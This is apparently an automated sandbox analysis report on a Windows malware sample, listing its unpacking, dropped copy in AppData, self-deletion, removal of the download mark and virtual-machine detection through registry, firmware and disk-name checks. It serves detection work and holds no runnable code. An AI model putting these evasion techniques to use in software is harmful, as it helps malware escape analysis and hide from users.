Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe

Unpacked PE file: 0.2.3sfCdeA1H2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.dasu:W;.dedileg:W;.rsrc:R; vs .text:EW;

Source: 3sfCdeA1H2.exe	Static PE information: section name: .dasu
Source: 3sfCdeA1H2.exe	Static PE information: section name: .dedileg
Source: tttcvva.1.dr	Static PE information: section name: .dasu
Source: tttcvva.1.dr	Static PE information: section name: .dedileg

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_02C91540 pushad ; ret	0_2_02C91550
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_02CE34E1 push esp; ret	0_2_02CE34E3
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_02CE1884 push B63524ADh; retn 001Fh	0_2_02CE18BB
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_02CE2381 pushfd ; iretd	0_2_02CE2382
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_004014D9 pushad ; ret	5_2_004014E9
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_004031DB push eax; ret	5_2_004032AB
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_02C64669 push esp; ret	5_2_02C6466B
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_02C62A0C push B63524ADh; retn 001Fh	5_2_02C62A43
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_02C63509 pushfd ; iretd	5_2_02C6350A
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_04771540 pushad ; ret	5_2_04771550

Source: 3sfCdeA1H2.exe	Static PE information: section name: .text entropy: 7.485220555336947
Source: tttcvva.1.dr	Static PE information: section name: .text entropy: 7.485220555336947

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\tttcvva

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\tttcvva

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\3sfcdea1h2.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\tttcvva:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\tttcvva	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\tttcvva	API/Special instruction interceptor: Address: 7FFE2220D584

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 445	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1224	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 907	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1287	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 874	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 879	Jump to behavior

Source: C:\Windows\explorer.exe TID: 3512	Thread sleep count: 445 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3020	Thread sleep count: 1224 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3020	Thread sleep time: -122400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3736	Thread sleep count: 907 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3736	Thread sleep time: -90700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6252	Thread sleep count: 283 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6272	Thread sleep count: 289 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6276	Thread sleep count: 261 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3020	Thread sleep count: 1287 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3020	Thread sleep time: -128700s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e\xe
Source: explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JVMware Virtual d
Source: explorer.exe, 0000000B.00000003.2714096371.00000000084E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&0000000@v
Source: explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.00000000083F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2677069781.0000000008401000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.00000000083F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000083F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.00000000083F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000B.00000003.2628907119.000000000487E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}NWTVCDUMO
Source: explorer.exe, 0000000B.00000003.2711717096.000000000B5F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000000B.00000003.2632404157.0000000004818000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}erMana
Source: explorer.exe, 0000000B.00000003.2714096371.00000000084E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000B.00000003.2719921099.000000000B6DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}P
Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 0000000B.00000002.2955410172.0000000000C43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e=C:SystemRoot=C:\WindowsTEMP=
Source: explorer.exe, 0000000B.00000002.2963794054.000000000838F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000B.00000003.2632404157.0000000004818000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\e
Source: explorer.exe, 0000000B.00000003.2724139513.000000000B65C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1777648899.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SIk&Ven_VMware&Prod_Virtual_disk\4
Source: explorer.exe, 0000000B.00000003.2632962015.0000000008125000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}34-1002_Classes\CLSID\{c53@
Source: explorer.exe, 0000000B.00000003.2720465406.00000000084BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.004D7-9371-BEB064C98683}\0\::{7b81be6a-ce2b-4676-a29e-eb907a5126c5}\::{d450a8a1-9568-45c7-9c0e-b4f9fb4537bd}I!
Source: explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWdo
Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\e
Source: explorer.exe, 00000001.00000000.1775499027.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXTroVMWare
Source: explorer.exe, 00000001.00000000.1777648899.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 0000000B.00000002.2969569180.000000000B5A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000003.2720465406.00000000084BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.00 !
Source: explorer.exe, 00000001.00000000.1773845520.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1778598700.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000B.00000003.2720465406.00000000084BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.00
Source: explorer.exe, 00000001.00000000.1773845520.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000003.2720465406.00000000084BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.00
Source: explorer.exe, 0000000B.00000003.2709874826.00000000084E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000@v
Source: explorer.exe, 0000000B.00000003.2724139513.000000000B65C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000D
Source: explorer.exe, 0000000B.00000002.2963794054.00000000083F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000003.2720465406.00000000084BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD001.004
Source: explorer.exe, 00000001.00000000.1777648899.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1777648899.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 0000000B.00000003.2709874826.00000000084E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000B.00000003.2720015673.000000000B622000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}s.dll
